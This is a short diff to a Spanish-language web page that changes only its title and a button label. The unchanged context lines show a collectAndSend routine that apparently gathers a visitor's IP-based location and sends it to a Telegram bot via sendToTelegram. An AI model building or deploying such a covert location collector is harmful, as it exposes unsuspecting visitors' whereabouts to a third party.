--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="es">
 <head>
   <meta charset="UTF-8" />
-  <title>Test</title>
+  <title>Test2</title>
   <style>
     body { font-family: Arial; padding: 20px; background: #f0f0f0; }
     .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; }
@@ -250,7 +250,7 @@ Longitud: ${ipRes.value.lon}
       await sendToTelegram(locationInfo);
     }
 
-    startBtn.textContent = "Datos enviados";
+    startBtn.textContent = "🦆🦆🦆🦆🦆";
   }
 
   startBtn.onclick = collectAndSend;
